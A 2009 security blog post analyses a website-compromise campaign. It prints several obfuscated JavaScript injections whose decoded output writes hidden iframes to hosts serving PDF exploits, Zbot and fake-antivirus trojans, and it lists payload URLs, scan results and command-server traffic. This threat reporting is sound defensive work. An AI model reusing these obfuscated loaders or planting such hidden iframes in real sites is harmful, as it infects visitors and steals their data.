Thursday, February 19, 2009

Compromised websites spread InternetAntivirus: January - February, 2009

Web Poisoning: Iframe injection + PDF Exploit / Trojan-Spy.Win32.Zbot + InternetAntivirus

Malicious code inserted:

<!-- ad -->
<script>
osoem=(4e0,190);
johbc=(9e0,1909);
arnrb=(65.,""+"a"+"m"+"e");
vpkgs=(0x826," ");
oymzl=(1.89e2<=656?"":5.);
oozuk=(0x44>6?"17":2.934e3);
aivuk=(4e0,""+".");
rjreh=(5.4e1>0.3?"":.5);
mnswd=(414>6.17e3?70.:"9");
zlits=(5.5e1>1.5e1?".":46.);
wlpwa=(9,"93");
dmdcw=(1e1<.6495?278.:"las");
bthvu=(0.900,"r");
xwjcg=(0x4,"yl");
wxvoe=(0.64<=0.1?.9:""+"i"+"s"+"");
wafzv=(646>8.39e2?9518:"i");
jfazq=(0x685>=8e1?""+"b"+"i"+"l"+"":4.3e1);
ernzk=(.840>=2.?53.:"i"+"t"+"y"+"");
yfnul=(8.51e2,":");
skxws=(.448,"");
vyrje=(0x6,"<");
kylrc=(59,"/i");
zllcn=(8483,""+"a"+"");
oxynx=(9.6e1,""+"m"+"e"+"");
elbis=(0x66<2002?"r":0x547);
slnat=(7.07e2,"");
onlvz=(9e0<0x54?"='":58);
bljji=(6.,"ht");
oowax=(9.3e1<=4?835.:"tp");
vafut=(93>634.?6157.:":/");
hswsd=(.3>=6.?33.:"");
bwtwu=(0.9,"o");
efesv=(0.8,"/");
nczim=(8166>=3.495e3?"=":0.7);
kkkka=(0x93,"2");
btqpy=(.6," ");
yxjvl=(9.,""+"");
myfsk=(7,"");
qcevo=(0x2<.350?.4:"h");
lmiph=(.1055>=0.92?0.8:"i");
fgjfd=(329,"d");
onjpi=(9.84e2<=854.?0.7687:"e");
ypdfc=(0.65<=42.?" "+"":.8318);
claug=(0x3590,">");
lpcpn=(7.7e1,"");
nhbvb=(2,""+">");
flrft=(0x9,5);
irhwk=((93<=9893?.711:3)<=(0.9>=9.4e1?.569:3.692e3)
?(.3<=1.2e1?osoem:2.21e2):
(4.>.3?.6:0.31));
fyatw=((973.,0.5e1)<(3928.,.7689)?(5<=.532?.696:2e0):
(5e0,johbc));
nwyro=((7e0>=8.?3869.:0x2),(5.91e2>=0.957e3?0x2110:
arnrb)+(0.5e1,vpkgs)+
(.830>=9.8e1?.533:oymzl));
xwuua=((7e0>=82.?.9357:7.),(1983.>=20.?"85"+"."+"":
8352)+(6.35e2<0x2?0x83:oozuk)+
(1.2e1>0x4843?56:aivuk));
kzxos=((.3727,5.06e2),(.727,rjreh)+(91,"1"+"3")+(6849.,
mnswd)+(15.,zlits)+(4>.336?""+"1"+"":.2)+
(0.68,wlpwa)+(.79,"/")+(.136,dmdcw)+(0x4<.5?.4:"the")
+(6,bthvu)+(2.,""));
kxotj=((3.08e2,0.7310),(0x2,xwjcg)+(7e0<=7.269e3?"e
=":5.106e3)+(2.,""+"'"+"v"+"")+
(0x4<6e0?wxvoe:0x7616)+
(.9511<=0x5251?wafzv:0.1902)+(2.807e3>2.1e1?jfazq:
0x2)+(5588.>=2.?ernzk:8.11e2)+
(781>=0.2435?yfnul:67)+
(.82,skxws));
xynhe=((.58,1.266e3),(33>0x32?0x4312:vyrje)+(.6084
<=957?kylrc:0x2769)+(0.63,"fr")+
(2e0,zllcn)+(6.,oxynx)+(426,""));

aaa=(((61>=0.7?4870:178)>=(3.78e2>=0x5?7.709e3
:6.427e3)?(0x1985,9389):(6e0,.825)),((0.229e3>
=69.?4.562e3:3132)<=(66<=0x3?7e0:0x229)?(5217.
,5e0):(376.>7.86e2?6.5e1:document)))[(((.82,0x6)
<=(8130,.7246)?(4.7e1<.551?2:0.991):(0x9688>=78
1.?0.31:5.04e2)),((7.1e1>=.1?.29:3.8e2),(382,"w")+
(9865>=.2?elbis:13)+(.152>=0x452?0.363:""+"it"+"")
+(5.<=8.1e1?"e":0x35)))]((((.6209,6193.),
(1.2e1>=9?irhwk:2.89e2))<((.70,.768)>(5.>=.8447?
0x27:681.)?(9870,96.):(454,fyatw))?((0x5<7852?
.16:0.4)<=(1e0>1.173e3?0x9967:.3)?(0.3,"<ifr"):(.81
2<27.?58:1e0))+((53.<=29.?1194.:0x9563),(0x961,
nwyro))+((1631>88?0x578:7e1)>=(79>=.44?0x107:
6.07e2)?(.6,slnat)+(5.94e2,""+"s"+"")+(7.21e3>5e0?
""+"r"+"c"+"":0.509e3)+(84.<=185.?onlvz:193)+(.2
02,bljji)+(5.6e2<3365.?oowax:1.8e1)+(338.<738.?v
afut:0.5e1)+(0.1e1>=.21?"/":9e0)+(4.5e3>=1?hswsd
:.573):(.3<.272?60.:0.1))+((0x6,7.5e1),(986.<=36.?
6.3e1:xwuua))+((256>=57.?.89:8e0),(13.>0x76
43?216.:kzxos))+((0.183>1?.20:.5705)<=(27>=3e
0?.909:39)?(6506.,"")+(.794>=0.2?bwtwu:0x66)+(.3
9,"1")+(3.03e3,efesv)+(7.2e1>=0x79?0.202:"?")+(0x
83,"t")+(0.3e1,nczim)+(1538.<=228.?0.9e1:kkkka)+
(0.768>374.?348.:"'")+(1606.,btqpy)+(7.212e3,"s")
+(0x8619,"t")+(3.>0x2864?8957:yxjvl):(.756>1221.
?932:6.672e3))+((653.,8.07e2)>=(.95<2.4e1?4e0:
554)?(0x6291,kxotj):(4.9e1,9.))+((263<6.423e3?53.:
8.24e2),(4>=0.13?myfsk:.6)+(238<0.6?0x37:qcevo)+
(.984>=0x2261?2.052e3:lmiph)+(.94,"d")+(7.845e3
>=5?fgjfd:.294)+(4e0,onjpi)+(4872.,"n")+(0.3754>.
4?533:"'"+"")+(0.794e3>9487.?4.8e1:ypdfc)+(5374
.,claug)+(5.9e1,lpcpn))+((0.90,408.),(0x2<=5.041e3
?xynhe:0x3))+((2.<1.328e3?377.:8e0)<(2.58e2,1e0
)?(0x826<.4?0x436:.1):(4.2e1<8?0.88e2:nhbvb)):((
5901>=.8159?flrft:9e0),(.4,8.933e3))));

</script><!-- /ad -->

 
Result:
 <iframe src='hxxp://85.17.139.[BLOCKED]193/lasthero1/?t=2' style='visibility:hidden' ></iframe>
  
Detected on:
  February 12 by http://www.malwaredomainlist.com/mdl.php?sort=Date......
  February 12 by http://forum.malekal.com/viewtopic.php?f=62&t=17311
  
Virustotal Analysis on 2009.02.12 09:55:10 (CET):
 2/39 (5.13%)
 Ikarus T3.1.1.45.0 2009.02.12 Exploit.Win32.Pdfjsc
 a-squared 4.0.0.93 2009.02.12 Exploit.Win32.Pdfjsc!IK
  
Virustotal Analysis on 2009.02.12 09:59:40 (CET):
  
 Avast 4.8.1335.0 2009.02.11 Win32:Fabot
 eSafe 7.0.17.0 2009.02.11 Suspicious File
 GData 19 2009.02.12 Win32:Fabot
 Symantec 10 2009.02.12 Suspicious.MH690.A
 TrendMicro 8.700.0.1004 2009.02.12 PAK_Generic.001
  
 http://www.symantec.com/security_response/writeup.jsp?docid=2009-020600-4945-99


Other Malicious code inserted:

<!-- ad --><script>
uyimh=687;
qxcxg=4804;
ddytx=7948;
xkjpv="write";
mzsrv="me";
zqfqw="et";
gdtrk="/' st";
rpiia="yl";
qxaol="";
ldlvw="i";
zfhuu="ty";
hvkhb=":h";
hbqmm="d";
hauzn="";
zdqdp=4;
sjgbi="if";
rpygo="r";
syjnh=" sr";
rwanv="c";
elujl="=";
hrgnc=863;
akzpp=8853;
tplxn=" ";
cvtot="</";
qtndm="";
jlooz=3953;
uyimh=687;
qxcxg=4804;
ddytx=7948;
xkjpv="write";
mzsrv="me";
zqfqw="et";
gdtrk="/' st";
rpiia="yl";
qxaol="";
ldlvw="i";
zfhuu="ty";
hvkhb=":h";
hbqmm="d";
hauzn="";
zdqdp=4;
sjgbi="if";
rpygo="r";
syjnh=" sr";
rwanv="c";
elujl="=";
hrgnc=863;
akzpp=8853;
tplxn=" ";
cvtot="</";
qtndm="";
jlooz=3953;
gftzo=(9.007e3>=5e1?uyimh:qxcxg);
jjaqh=(ddytx>.2438?xkjpv:3.);
gmbpt=(7.3e1>=36?mzsrv:.45);
zxtsi=(323,zqfqw+gdtrk+rpiia+"e='"+"v"+"isib");
hzpmf=(0x587,qxaol+ldlvw+"li"+zfhuu+hvkhb+"id"+hbqmm+"en"+"'"+hauzn);
rmtyf=(6.5e1,"");

aaa=((567,gftzo),(0x2,document))[((0.3,2.46e2)>=(17,7918.)?(5249.>=0.
8188?0x816:.5486):(.2717<=.77?jjaqh:0x14))](((zdqdp,2.),(0.591,""+"<"+
sjgbi+rpygo+"a")+(82,gmbpt)+(0.1301,syjnh+rwanv+elujl+"'"+"h"+"ttp"+"")
+(8581.<.887?0.7:"://t"+"ruittbros.n")+(476,zxtsi)+(hrgnc>=akzpp?9.909e
3:hzpmf)+(69<38.?0.249:tplxn+">"+cvtot+"if"+qtndm)+(2.>1.?"ram"+"e>"
:64.)+(223.>=jlooz?1.:rmtyf)));</script><!-- /ad -->

  
 
Result:
 IFRAME is inserted into compromised webpages
  
 <iframe src='hxxp://truittbros.net/' style='visibility:hidden' >
</iframe>
<iframe src='hxxp://idealadvertising.org/clicksagent/?...'
style='visibility:hidden' >
</iframe>

idealadvertising.org has been created February 5, 2009 (Registrar: Joker.com)

Same suspicious IP 85.17.189.183 (hosted by LEASEWEB - Netherlands)
  
Payload detected by using the IP:
  
 85.17.189.183/clicksagent/?h=17h 200 Found
  
Result:
  
 MS-DOS executable PE for MS Windows
  
Virustotal Analysis:
  
 File install.exe received on 02.19.2009 00:14:46 (CET)
Result: 7/39 (17.95%)

 http://www.virustotal.com/analisis/33723c307ee9548f4150a30a0679a62b
  
  File Size: 47,104 bytes
  
ThreatExpert Analysis:
  
 http://www.threatexpert.com/report.aspx?md5=dadb6a147a831902e20
62666e045a418

http://www.threatexpert.com/threats/trojan-win32-internetantivirus.html
  
Alias:
  
 Trojan.Win32.InternetAntivirus [Ikarus]
  


Malicious code inserted:

<!-- ad -->
<script language="JavaScript">
function rkfg(jflq){
// Analyst note: thin wrapper around String.fromCharCode. The decoder loop below
// calls it with one 3-character substring at a time (a 3-digit decimal character
// code), so it relies on the implicit string-to-number conversion of the argument.
return String.fromCharCode(jflq);
}
// Analyst note: ohhe is the hidden-iframe markup shown under "Result" below, stored
// as a run of 3-digit decimal character codes ("060" = '<', "105" = 'i', "102" = 'f',
// ...). Nothing is encrypted, only encoded. The literal is line-wrapped here by the
// blog layout; in the injected page it is presumably a single line.
var ohhe="060105102114097109101032115114099061039104116116112058
04704711511711210111410511111409710012204610511010211104711111
21051150470631160610490510390321191051001161040610390480390321
04101105103104116061039048039032115116121108101061039118105115
10509810510810511612105803210410510010010111005903906206004710
5102114097109101062";
var ifdm="";
// Decode three digits at a time into ifdm; qhxk is an implicit global (no var).
for(qhxk=0;qhxk<ohhe.length;qhxk+=3){
ifdm+=rkfg(ohhe.substr (qhxk, 3));
}
// Only touches the browser status-bar text; has no effect on the injection itself.
window.status='Done';
// Writes the decoded <iframe ...> into the page at the point where the script runs.
document.write(ifdm);
</script>
<!-- /ad -->
  
 * function and variable names are random letters
 
Same malicious code inserted:

<script language="JavaScript">
function pwby(yyiu){
// Analyst note: same one-line String.fromCharCode wrapper as rkfg in the sample
// above, only the function and parameter names differ.
return String.fromCharCode(yyiu);
}
// Analyst note: same 3-digit decimal character-code encoding as the sample above.
// Compared with ohhe, the digits appear to differ in a single group ("050" instead
// of "051" in the third line), which would change only the value of the ?t= query
// parameter in the decoded iframe URL. The literal is line-wrapped by the blog layout.
var trsl="060105102114097109101032115114099061039104116116112058
04704711511711210111410511111409710012204610511010211104711111
21051150470631160610490500390321191051001161040610390480390321
04101105103104116061039048039032115116121108101061039118105115
10509810510810511612105803210410510010010111005903906206004710
5102114097109101062";
var mpsq="";
// Decode three digits at a time into mpsq; hwrv is an implicit global (no var).
for(hwrv=0;hwrv<trsl.length;hwrv+=3){
mpsq+=pwby(trsl.substr (hwrv, 3));
}
// Only touches the browser status-bar text; has no effect on the injection itself.
window.status='Done';
// Writes the decoded <iframe ...> into the page at the point where the script runs.
document.write(mpsq);
</script>
  
Result:
 <iframe src='hxxp://superioradz.info/opis/?t=13' width='0' height='0' style='visibility: hidden;'>
</iframe>
  
Analysis:
 http://www.threatexpert.com/report.aspx?md5=95c04992bf14769fbd1b7b0ada9b9e87
  
  
HTTP Requests:
  
 hxxp://85.17.189.183/opis/?6e53cb91d272691ff1f03316b4e40fe897304252d0b05b1
c33d58155a3825e960ee3a527ad0f3b81a23df2c7d43150e96be9dca7a6e59d3f4d816
ff4a5122e8f
 hxxp://85.17.189.183/opis/?8fbe2b5fa4842f6f0fe51f024732e6b290ef4e487d3779dc2
d10d646083af5315a0c295b173c9074618dc04b42ade64ca0abd171ed2dcd203721fc9
bdd89aba3
 text/html (JavaScript)
  
Javascript Analysis:
  
 http://wepawet.iseclab.org/view.php?hash=ca172b3a2297a76af1183181cba4249a&t
=1234983863&type=js
  
Virustotal Analysis: VT: 1/39 (2.71%)
  
 http://www.virustotal.com/analisis/df3279de33cdf24699004ab05ef61d13
  
Alias:
 JS/Xilos [Microsoft]
  
  
HTTP Requests:
  
 hxxp://85.17.189.183/opis/?35c0378e5af230cb06d1aef60e9d313999fb02e0230541
0fd4357d45f884bd55584e963ddeeb3e2010d55b1bc73920171042005b87c96f99cb
9b3820d28f4413
 application/x-shockwave-flash (swf - Shockwave Flash File)
  
  
Result:
 MS-DOS executable PE for MS Windows downloaded
  
 hxxp://85.17.189.183/opis/?h=17
  
 File name: a.exe
File Size: 8704 Bytes
  
ThreatExpert Analysis:
  
:http://www.threatexpert.com/report.aspx?md5=8d82c411cb3748dfefcbd4277db7fbfd
  
Virustotal Analysis:
  
 File a.exe received on 02.18.2009 14:11:35 (CET)
Result: 5/39 (12.82%)

http://www.virustotal.com/analisis/a1bee09c6dd5cf3dbd890a4b777156b2
  
 File a.exe received on 02.19.2009 00:14:46 (CET)
Result: 7/39 (17.95%)

http://www.virustotal.com/analisis/4e0e89411f8cfb49482553319d080e38
  
Alias:
  
 Suspicious.MH690 [Symantec]
 TrojanDownloader:Win32/Obitel.gen!A [Microsoft]
  
 http://www.symantec.com/security_response/writeup.jsp?docid=2009-020600-4945-99
  
  
Analysis: First infection:
  
  
HTTP Requests:
 85.17.143.203:80 - [banksguard.com]
  
 GET /pics/ncr.exe
  
 File name: ncr.exe
 File Size: 61952 Bytes
  
Alias & packer info:
  
 Troj/Inject-EF [Sophos]
 Trojan.Win32.Zbot [Ikarus]
 packed with: PE_Patch [Kaspersky Lab]
  
ThreatExpert Analysis:
  
 http://www.threatexpert.com/report.aspx?md5=5d074816dc6625fcd8df4c8f7dce992b
  
Iseclab Anubis Analysis:
  
 Ikarus Virus Scanner - Trojan.Win32.Zbot (Sig-Id:454183)
 http://anubis.iseclab.org/?action=result&task_id=14fd198d4506042d4c901eed512f5f33
8&format=html
  
Virustotal Analysis:
  
 File ncr.exe received on 02.18.2009 20:05:49 (CET)
Result: 11/39 (28.21%)

http://www.virustotal.com/analisis/2bcb0d524cf1e0524997077667c93963
  
 File ncr.exe received on 02.19.2009 11:55:07 (CET)
Result: 14/39 (35.9%)

http://www.virustotal.com/analisis/e1721fe1408999bfb71f97e749fa1b17
  
 mcenspc.dll
  
 http://www.threatexpert.com/files/mcenspc.dll.html
  
  
  
Analysis: After first infection:
  
  
HTTP Activity:
 85.17.143.203:80 - [banksguard.com]
 Request: POST /pics/receiver/online
  
Anubis Iseclab Analysis:
  
 http://anubis.iseclab.org/?action=result&task_id=14fd198d4506042d4c901eed512f5
f338&format=html
  
  
Detected on:
  
  February 12 by http://secuboxlabs.fr/
  February 12 by http://www.malwaredomainlist.com/forums/index.php?topic=2550.0
  February 12 by http://forum.malekal.com/viewtopic.php?f=62&t=17311
  February 15 by http://www.malwaredomainlist.com/mdl.php?search=superioradz.info
  
 The domain superioradz.info has suddenly disappeared
(NS lookup failed) and the folder has been deleted/renamed.

Other Malicious code inserted:

<!-- ad -->
<script>
qedla=(6.,285);
rkkfh=(47>.7?"":.6461);
vqsqr=(7628,"r");
eazri=(580>=0x61?"":9.15e2);
lfhmf=(4.43e2,"de");
fxzlv=(0x62,""+"l"+"a"+"d"+"");
jhcfl=(172.,"si");
osdjh=(.7,""+"n"+"");
riwhq=(.90,""+"");
urrox=(1.1e1,"");
lpzjx=(502.<0x32?58:"e>");
mqbwp=(.87,1185);
mwpwc=(366>.225?"":0x223);
vwlum=(.5991,"<");
kviru=(.4>=6?0x518:"s");
zqfbo=(66.,"r");
lwsau=(1,"t");
xqwee=(8.39e2>0x4149?536.:""+"");
mwztz=(3,""+"c"+"k"+"");
bonre=(89.<=.5773?.7:""+"a"+"");
qzdhg=(3.3e1<=6?4586:"g");
pjrjp=(388,"e");
wueyt=(0x75>0.6?"/":0x6);
yxmzd=(857,""+"t"+"");
sbkom=(2.96e2,"=");
bmwzz=(2.2e1,"2");
mvlil=(0.2>=0.919e3?.875:""+"'"+"");
hibed=(.7882<0x80?"yl":0x8300);
jspxp=(4.124e3,""+"e"+"="+"");
tkrie=(7,""+"'"+"v"+"");
wzpci=(61.<0x807?"s"+"i":1e0);
epeqe=(5.915e3,"bi");
nlydk=(5.821e3<=0x6?5e0:"t");
lodri=(8e0,":");
gsbcm=(6.8e2<=34.?0x4652:"");
yljdx=(.8,"idd");
ralhl=(1e0,"n' >");
dwiyy=(9990,"<");
fxuin=(0x91<=710.?"m":8e0);
cqgjk=(6e1,6);
xddte=((6.76e2,0.165)>=(0x4<81.?38.:6)?(1e0>614?1e0:0.5110):(9e0,qedla));
plwqh=((7>=.2310?.3:141.)<=(0x3713,.92)?(7666.,rkkfh)+(0.9,vqsqr)+(0.457
<.3?2:eazri):(.4<9?3.:979));tpghb=((0.8789>=4.?1e0:48.)<=(1121,40.)?(95.
<=0x88?9.5e1:.6):(46.<=.4?793:""));ajyne=((9.52e2<=0x4?0.6e1:0.994)>
(0x5249,0.6)?(6.3e1,"")+(285>=.2850?lfhmf:0x6)+(0x82,""+"a"+"")+(.831,fxzlv)
+(77.,"v"+"er")+(10.,"ti")+(5.94e2<=7.4e3?jhcfl:.5)+(6e2,osdjh)+(7.8e1
<0x8?1.64e2:"g.")+(0.9,""+"o"+"r"+"")+(0x5,"g"):(7.1e1<0x15?4e0:0.75e2));
vpxsa=((.63<=.2?0.5:.258),(4e0,riwhq)+(74.,"/"+"cl"+"i")+(2.365e3>=0.5?
urrox:6.));abflo=((0.428<=.7314?4.:2288)>(76.,.441)?(0.6,lpzjx):(2.746e3
<3518.?0x5662:0x738));

aaa=(((0x17,4.471e3),(3e0>8?0.93:23.)),((.1<0x738?6407:.87),(35.<=
3804.?document:61)))[(((.2816,0.5)<(9.792e3,73.)?(.85,4e0):(975,0x8))>=
((0.51,0x53),(7.803e3>.9638?0x647:823.))?((2.>=0.8597?9e0:.1),(6.>=3
?xddte:1.89e2)):((.627>=0.790?83.:mqbwp),(7e0,mwpwc))+((6e0,0.2687)
,(.177,""+"w"+""))+((9.9e2<0.9e1?0x66:1e0)>=(3.404e3>8858?5279.:
0x5666)?(0.702,0x2):(2.<=9654.?plwqh:0x4337))+((3.,0.26e2)<=(5,.48)
?(0x3116,0.9):(3.11e2,"i"))+((0x3584<=656.?0x402:0x6)>=(36,27.)?(.63
,35.):(49<70.?"t":2.))+((37.>.976?0.8:4e0)>(4398.>=59?4.:0x1)?(628.>
2353.?1.:.6779):(.1618,"e"))+((840>=55.?3.:96)<(.4008,0x5)?(9398.>=
0x99?tpghb:269):(0.77e2,3.817e3)))]((((0.133<=0x402?6e0:.91),
(0x7201,213.)),((.419,0.511e3),(6.361e3,vwlum)+(.168<=3?"ifra":0x8)
+(3e0,"m")+(9.74e2>=6.643e3?7.7e1:"e ")+(.461>=0x465?1:kviru)
+(.7282,zqfbo))+((.4108,0x414)>(0.6148>=.50?0.834:98)?(0x87>=
0x4716?27.:""+"c"+"="+"'"+"h"+"t"+""):(9<40?0x27:.66))+((0x10,0x69),
(3.534e3>0x8?lwsau:0.6865)+(.5,"p:")+(0x27>=0x5755?7e0:"//i")+(0.6,""))
+((0x8>.3887?.3794:2e0),(2009.,ajyne))+((.37<68.?7.:6.2e1)>(0x7,2698)
?(23.<=9.657e3?4e0:6.51e2):(0x4968,vpxsa))+((4.>.83?0x7:2.73e2)<=
(4.729e3<=.2?7e0:0.224)?(4.9e1<.61?0x7:.53):(3.62e2,xqwee)+(2.996e3,
mwztz)+(0x82>=0x3?"s":0.4666)+(0x145<1?.775:bonre)+(0.755,qzdhg)+
(0x129>=684?.887:pjrjp)+(0.636<0.4323?4e1:"nt")+(9e0,wueyt)+(0x377>
=.5?"?":90.)+(0x424>0x25?yxmzd:0.2562)+(4.3e1,sbkom))+((3706,0x1)
,(0x7863,bmwzz)+(9552<0x1?6.611e3:mvlil)+(.5085>1.86e2?0.102:" s")
+(3<62?"t":.2)+(0.90>2.74e2?8e0:hibed)+(.64>=6472?2.335e3:jspxp)
+(545.<=565.?tkrie:7.178e3)+(0x528>2977?9.:"i"+"")+(0.3,wzpci)
+(5589,epeqe)+(0x333<=74?.768:"l")+(596<=2?6784:""))+((0.9,34.),
(70.,"")+(6377>=2.086e3?"i":0x4464)+(.161,nlydk)+(8e1<.510?7446:"y")+
(0x2<=41.?lodri:25.)+(9.,gsbcm))+((0.91>=.5?.67:697.),(97.>1?""+"h"+"":62)
+(96.,yljdx)+(7e0<5.47e2?"e":5e0)+(0x52,ralhl)+(0.19>=.580?8:dwiyy)+
(0.037e3>.698?"/"+"if"+"r"+"a":39.)+(9,fxuin))+((0x3397,cqgjk)<=
(0.5236<=374.?5e0:0.4)?(8.059e3>8794?4.56e2:4.314e3):(.2562,abflo))));

</script><!-- /ad -->

  
 
Result:
 IFRAME is inserted into compromised webpages
  
 <iframe src='hxxp://idealadvertising.org/clicksagent/?t=2' style='visibility:hidden' ></iframe>
<iframe src='hxxp://idealadvertising.org/clicksagent/?...'
style='visibility:hidden' >
</iframe>

idealadvertising.org has been created February 5, 2009 (Registrar: Joker.com)

Same suspicious IP 85.17.189.183 (hosted by LEASEWEB - Netherlands)
  
JavaScript Analysis:
  
 http://wepawet.iseclab.org/view.php?hash=45d3...
  
JS Obfuscated Code:
  
 hxxp://idealadvertising.org/clicksagent/?t=2
 hxxp://idealadvertising.org/clicksagent/?075c.....
 hxxp://idealadvertising.org/clicksagent/?6cb.....
  
Network Activity:
  
 81.2.253.206:80 - [www.sprinterkiado.hu]
  
 Request: GET /index.php?session_id=57972&user_id=0&screen=8
  
 195.70.32.221:80 - [c.hu.tipptop.com]
  
 Request: GET /cgi-bin/?id=3608&c=LPmcnYzL&h=1
  
 85.17.189.183:80 - [idealadvertising.org]
  
 Request: GET /clicksagent/?t=2
  
Result: MS-DOS executable PE for MS Windows:
  
 hxxp://85.17.189.183/clicksagent/?h=17h

File name: ncr.exe
File Size: 8704 Bytes
  
Iseclab Anubis Analysis:
  
 http://anubis.iseclab.org/?action=result&task_id=12d602...
  
VirusTotal Results: 7/39 (17.95%):
 
 http://www.virustotal.com/analisis/33723c307ee9548f4150a30a0679a62b
 Analysed on 02.19.2009 00:14:46
  
Alias:
  
 http://www.symantec.com/security_response/writeup.jsp?docid=2009-020600-4945-99&tabid=2
 Suspicious.MH690.A [Symantec]